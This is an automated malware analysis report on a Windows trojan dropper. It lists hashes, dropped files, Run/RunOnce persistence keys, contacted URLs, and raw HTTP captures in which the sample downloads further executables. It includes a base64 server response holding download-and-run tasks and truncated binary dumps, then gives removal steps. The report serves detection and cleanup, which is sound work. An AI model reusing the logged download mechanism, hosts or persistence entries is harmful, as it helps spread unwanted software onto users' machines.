Sample_e68ca5ec6a

by malwarelabrobot on November 13th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: e68ca5ec6a07d63c252f085c4c4dd849
SHA1: d9a386c7f4ba437063653f9ce650e39bd0de822b
SHA256: 55decbd4501d581a970fd68b5400ea75ec06b7e8cc904354c19e25e812b1beca
SSDeep: 12288:QckJXcc1RD6w/UUFOeKSU78XnHML5LM0AD0EQ:gycRDX/RU7yeH
Size: 395264 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-10-23 19:47:39
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

OneTwo.exe:676
%original file name%.exe:4008
up.exe:3244

The Trojan injects its code into the following process(es):

EQXKU2FY9.exe:2260
%original file name%.exe:2668

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process EQXKU2FY9.exe:2260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\EQXKU2FY92\cast.config (38 bytes)

The process OneTwo.exe:676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\EQXKU2FY92\uninstaller.exe (8203 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
%Program Files%\EQXKU2FY92\EQXKU2FY9.exe.config (1 bytes)
%Program Files%\EQXKU2FY92\EQXKU2FY9.exe (66463 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
%Program Files%\EQXKU2FY92\uninstaller.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)

The Trojan deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.676.5090640 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.676.5090640 (0 bytes)

The process %original file name%.exe:2668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\OneTwo.exe (13250 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\up.exe (183001 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\up.exe.config (1 bytes)
C:\config.conf (47 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\SecondL.exe (0 bytes)

The process up.exe:3244 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (836 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (836 bytes)

Registry activity

The process EQXKU2FY9.exe:2260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASMANCS]
"FileDirectory" = "%windir%\tracing"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"CAYP7XY9GOM4WZF" = "%Program Files%\EQXKU2FY92\EQXKU2FY9.exe"

The process OneTwo.exe:676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:4008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Classes\Local Settings\MuiCache\63\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

The process %original file name%.exe:2668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\e68ca5ec6a07d63c252f085c4c4dd849_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e68ca5ec6a07d63c252f085c4c4dd849_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\e68ca5ec6a07d63c252f085c4c4dd849_RASMANCS]
"FileTracingMask" = "4294901760"

"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e68ca5ec6a07d63c252f085c4c4dd849_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e68ca5ec6a07d63c252f085c4c4dd849_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\e68ca5ec6a07d63c252f085c4c4dd849_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\e68ca5ec6a07d63c252f085c4c4dd849_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Classes\Local Settings\MuiCache\63\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\e68ca5ec6a07d63c252f085c4c4dd849_RASMANCS]
"FileDirectory" = "%windir%\tracing"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_2SC4W" = "C:\%original file name%.exe"

The Trojan deletes the following value(s) in system registry:

The process up.exe:3244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"EnableConsoleTracing" = "0"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"MaxFileSize" = "1048576"

Dropped PE files

MD5	File path
f430be4d53f89779b19169548173f089	c:\Program Files\EQXKU2FY92\EQXKU2FY9.exe
db7af23ed8a9718ec7d7b8a2632e1ca3	c:\Program Files\EQXKU2FY92\uninstaller.exe
5baff1e9d18e015d2b0ad1f2ebab3559	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\OneTwo.exe
2479b0932451b275445d77674766e746	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\up.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: UC96U1O1N
Product Name: UC96U
Product Version: 3.2.7.6
Legal Copyright: Copyright (c) 7946
Legal Trademarks:
Original Filename: Sxa77s.exe
Internal Name: Sxa77s.exe
File Version: 3.2.7.6
File Description: UC96U
Comments: U
Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	8192	389428	389632	4.19324	c9cb8ebd85b5c4f760055c44b368f55f
.rsrc	401408	4216	4608	3.40072	441513b8f7cb04e7a0da7231bf709f6c
.reloc	409600	12	512	0.070639	1ee237fc5977cb7108e999d558bda049

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://asedownloadgate.com/3/000000/wizzcaster_installer_v2.exe	94.23.199.17
hxxp://asedownloadgate.com/exe/updater.exe	94.23.199.17
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load	188.165.210.24
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok	188.165.210.24
hxxp://asedownloadgate.com/download/3/wizzcaster_v2.exe	94.23.199.17
hxxp://asedownloadgate.com/download/3/wizzcaster_uninstaller_v2.exe	94.23.199.17
hxxp://agent.wizztrakys.com/api/v5/config	188.165.210.24
hxxp://agent.wizztrakys.com/api/v5/link	188.165.210.24
hxxp://thegrandemanager.com/remotes_xml_sections.php	91.121.29.41
hxxp://ladomainadeserver.com/api/v5/config	176.31.252.54
hxxp://ladomainadeserver.com/api/v5/link	176.31.252.54
dns.msftncsi.com	131.107.255.255

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

POST /api/v5/config HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: ladomainadeserver.com

Content-Length: 38

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue

....

uid=57a764d042bf8&days_after_install=0

HTTP/1.1 200 OK

Date: Sun, 12 Nov 2017 03:01:37 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

Set-Cookie: laravel_session=d2947b2002bd1faa243758feab4d12761618cdc3; expires=Sun, 12-Nov-2017 05:01:37 GMT; Max-Age=7200; path=/; httponly

Content-Length: 28

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Sun, 12 Nov 2017 03
:01:37 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=d2947b2002bd1faa243758feab4d12761618cdc3; e
xpires=Sun, 12-Nov-2017 05:01:37 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=10, max=100..Connection: Keep-
Alive..Content-Type: text/html; charset=UTF-8..{"time_between_prints":
"15"}....


POST /api/v5/link HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: ladomainadeserver.com

Content-Length: 17

Expect: 100-continue

HTTP/1.1 100 Continue

....

uid=57a764d042bf8

HTTP/1.1 200 OK

Date: Sun, 12 Nov 2017 03:01:38 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

Set-Cookie: laravel_session=8de21df789bed94ee412bacc0695c276af4183a0; expires=Sun, 12-Nov-2017 05:01:38 GMT; Max-Age=7200; path=/; httponly

Content-Length: 66

Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/ladomainadeserver.com\/redirect\/57a764d042bf8"}HTTP
/1.1 200 OK..Date: Sun, 12 Nov 2017 03:01:38 GMT..Server: Apache/2.4.1
0 (Debian)..Cache-Control: no-cache..Set-Cookie: laravel_session=8de21
df789bed94ee412bacc0695c276af4183a0; expires=Sun, 12-Nov-2017 05:01:38
 GMT; Max-Age=7200; path=/; httponly..Content-Length: 66..Content-Type
: text/html; charset=UTF-8..{"link":"http:\/\/ladomainadeserver.com\/r
edirect\/57a764d042bf8"}..

GET /download/3/wizzcaster_v2.exe HTTP/1.1

Host: asedownloadgate.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sun, 12 Nov 2017 03:01:36 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcaster_v2.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
c9000..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......Z.........."...0.. ...n......r>... ...@....@.. ..............
......................@................................. >..O....@.
.hj...........................<....................................
........... ............... ..H............text...x.... ... ..........
........ ..`.rsrc...hj...@...l..."..............@..@.reloc............
..................@..B................T>......H........#..t........
....5...............................................0..V........s.....
r...p... 3...r...p(....o......r...p.(........(....(........X.........-
.... ...*...0............(....~....~....(....o....s....o......~....~..
..(....(....(...................~....( ...o!...rm..po"...~....( ....o#
...t.............%...o$...&........*...........GH........N.E........0.
.\.........(.....s%.....(&....o'...o(......o)......o*.....o .........i
o,.....o-....(&....o...... ...*.0..`........(&....o'....s%.....(&....o
'...o(......o)......o*.....o/.........io,.....o-........i(0..... ...*"
.(1....*....0..L........./..........(.........r...p~....(...........(.
........r...p~....(.........*.0.............(........&....*...........
.......&.(1.....*...0..9........~.........,".r...p.....(2...o3...s4...
........~..... ..*....0...........~..... ..*".......*.0...........~...
.. ..*".(5....*Vs....(6...t.........*..BSJB............v2.0.50727.....
.l...`...#~......0...#Strings........$...#US. .......#GUID...0...D<<< skipped >>>

GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1

Host: asedownloadgate.com


HTTP/1.1 200 OK

Date: Sun, 12 Nov 2017 03:01:37 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
2d000..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......Z.........."...0..`...n......r~... ........@.. .................
...... ............@................................. ~..O........j...
........................|.............................................
.. ............... ..H............text...x^... ...`.................. 
..`.rsrc....j.......l...b..............@..@.reloc.....................
.........@..B................T~......H........#..t............5...G...
........................................0..V........s.....r...p... 3..
.r...p(....o......r...p.(........(....(........X.........-.... ...*...
0............(....~....~....(....o....s....o......~....~....(....(....
(...................~....( ...o!...rm..po"...~....( ....o#...t........
.....%...o$...&........*...........GH........N.E........0..\.........(
.....s%.....(&....o'...o(......o)......o*.....o .........io,.....o-...
.(&....o...... ...*.0..`........(&....o'....s%.....(&....o'...o(......
o)......o*.....o/.........io,.....o-........i(0..... ...*".(1....*....
0..L........./..........(.........r...p~....(...........(.........r...
p~....(..........;.8...C.8...K.L...S.8...[.8...c.c...k...I...:........
...................................,.P.S..............................
.................................................\.................C..
....................................................Psa1.ldz2SDa6as59a
dass.Uji2.get_UTF8.<Module>.System.IO.P.R.Kaawa.mscorlib.Loa<<< skipped >>>

POST /remotes_xml_sections.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: thegrandemanager.com

Content-Length: 169

Expect: 100-continue

Connection: Keep-Alive


HTTP/1.1 100 Continue
....



remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1
HTTP/1.1 200 OK

Date: Sun, 12 Nov 2017 03:01:16 GMT

Server: Apache

Set-Cookie: PHPSESSID=vs5evbefttjqgb1v0shntqo793; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 1608

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

PHVwZGF0ZXMgcmVmcmVzaD0iOTAiPgoKPHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bm
xvYWQgbmFtZT0iU2Vjb25kTCIgdmFsdWU9Imh0dHA6Ly9hc2Vkb3dubG9hZGdhdGUuY29t
L2Zyb21fYmFja3VwLzc0NzQ3NC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249Ii
IgIHNvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5h
bWU9IlNlY29uZEwiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW
9kIHR5cGU9ImFkZCIgbmFtZT0iUXNPbmUiIHZhbHVlPSIxNzExMTIiLz4NCg0KPC9wZXJm
b3JtPg0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iUXNPbm
UiIHZhbHVlPSI0NTE3MTExMiIgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4N
CjwvdGFzaz48dGFzaz4NCg0KPHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJPbmVUd2
8iIHZhbHVlPSJodHRwOi8vYXNlZG93bmxvYWRnYXRlLmNvbS8zLzAwMDAwMC93aXp6Y2Fz
dGVyX2luc3RhbGxlcl92Mi5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPSIiIG5ldD0ieW
VzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9Ik9uZVR3byIgdmFsdWU9Im5v
dHdhaXQiIHBhcmFtcz0iNTdhNzY0ZDA0MmJmOCIvPg0KPG1vZCB0eXBlPSJhZGQiIG5hbW
U9IkhhaGEiIHZhbHVlPSIwMDAxNzExMTIiLz4NCg0KPC9wZXJmb3JtPg0KDQo8Y29uZGl0
aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iSGFoYSIgdmFsdWU9IjE3MTExMi
IgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCjwvdGFzaz48dGFzaz4NCg0K
PHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJ1cCIgdmFsdWU9Imh0dHA6Ly9hc2Vkb3
dubG9hZGdhdGUuY29tL2V4ZS91cGRhdGVyLmV4ZSIgdmVyc2lvbj0iIiAgc29mdHdhcmU9
IiIgbmV0PSJ5ZXMiIC8 DQo8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0idXAiIHZhbH
VlPSJ3YWl0IiBwYXJhbXM9IndlIi8 DQo8bW9kIHR5cGU9ImFkZCIgbmFtZT0iRGF0ZSIg
dmFsdWU9ImZlOGYxNzExMTIiLz4NCg0KPC9wZXJmb3JtPg0KDQo8Y29uZGl0aW9ucz4NCg
0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iRGF0ZSIgdmFsdWU9IjE3MTExMiIgbWF0

<<< skipped >>>

POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 44

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue

....

api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK

Date: Sun, 12 Nov 2017 03:01:35 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=1h8eehb8aum5ds8vsg57veaf83; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

{"message":"Track was added"}....

POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 44

Expect: 100-continue

HTTP/1.1 100 Continue

....

api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK

Date: Sun, 12 Nov 2017 03:01:36 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=0tdq0r2v0dr4rguqsr05n05cd5; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..

GET /3/000000/wizzcaster_installer_v2.exe HTTP/1.1

Host: asedownloadgate.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sun, 12 Nov 2017 03:01:33 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcaster_installer_v2.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
2f600..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......Z.........."...0......n........... ........@.. .................
......`............@.................................8...O........j...
................@.....................................................
.. ............... ..H............text........ ...................... 
..`.rsrc....j.......l..................@..@.reloc.......@.............
.........@..B................l.......H........#..t............5...o...
........................................0..V........s.....r...p... 3..
.r...p(....o......r...p.(........(....(........X.........-.... ...*...
0............(....~....~....(....o....s....o......~....~....(....(....
(...................~....( ...o!...rm..po"...~....( ....o#...t........
.....%...o$...&........*...........GH........N.E........0..\.........(
.....s%.....(&....o'...o(......o)......o*.....o .........io,.....o-...
.(&....o...... ...*.0..`........(&....o'....s%.....(&....o'...o(......
o)......o*.....o/.........io,.....o-........i(0..... ...*".(1....*....
0..L........./..........(.........r...p~....(...........(.........r...
p~....(.........*.0.............(........&....*..................&.(1.
....*...0..9........~.........,".r...p.....(2...o3...s4...........~...
.. ..*....0...........~..... ..*".......*.0...........~..... ..*".(5..
..*Vs....(6...t.........*..BSJB............v2.0.50727......l...`...#~.
.....0...#Strings........$...#US. .......#GUID...0...D...#Blob....<<< skipped >>>

GET /exe/updater.exe HTTP/1.1

Host: asedownloadgate.com


HTTP/1.1 200 OK

Date: Sun, 12 Nov 2017 03:01:33 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="updater.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
235600..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L......Z.........."...0... ..n........!.. ... !...@.. ................
........#...........@.................................8.!.O.... !..j..
..................#.......!...........................................
... ............... ..H............text..... .. .... .................
 ..`.rsrc....j... !..l.... .............@..@.reloc........#......T#...
..........@..B................l.!.....H........#..t............5.... .
.........................................0..V........s.....r...p... 3.
..r...p(....o......r...p.(........(....(........X.........-.... ...*..
.0............(....~....~....(....o....s....o......~....~....(....(...
.(...................~....( ...o!...rm..po"...~....( ....o#...t.......
......%...o$...&........*...........GH........N.E........0..\.........
(.....s%.....(&....o'...o(......o)......o*.....o .........io,.....o-..
..(&....o...... ...*.0..`........(&....o'....s%.....(&....o'...o(.....
.o)......o*.....o/.........io,.....o-........i(0..... ...*".(1....*...
.0..L........./..........(.........r...p~....(...........(.........r..
.p~....(.........*.0.............(........&....*..................&.(1
.....*...0..9........~.........,".r...p.....(2...o3...s4...........~..
... ..*....0...........~..... ..*".......*.0...........~..... ..*".(5.
...*Vs....(6...t.........*..BSJB............v2.0.50727......l...`...#~
......0...#Strings........$...#US. .......#GUID...0...D...#Blob...<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

EQXKU2FY9.exe_2260_rwx_00336000_00002000:

uSql

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

OneTwo.exe:676
%original file name%.exe:4008
up.exe:3244
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

%Program Files%\EQXKU2FY92\cast.config (38 bytes)
%Program Files%\EQXKU2FY92\uninstaller.exe (8203 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
%Program Files%\EQXKU2FY92\EQXKU2FY9.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
%Program Files%\EQXKU2FY92\uninstaller.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\OneTwo.exe (13250 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\up.exe (183001 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\up.exe.config (1 bytes)
C:\config.conf (47 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"CAYP7XY9GOM4WZF" = "%Program Files%\EQXKU2FY92\EQXKU2FY9.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_2SC4W" = "C:\%original file name%.exe"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.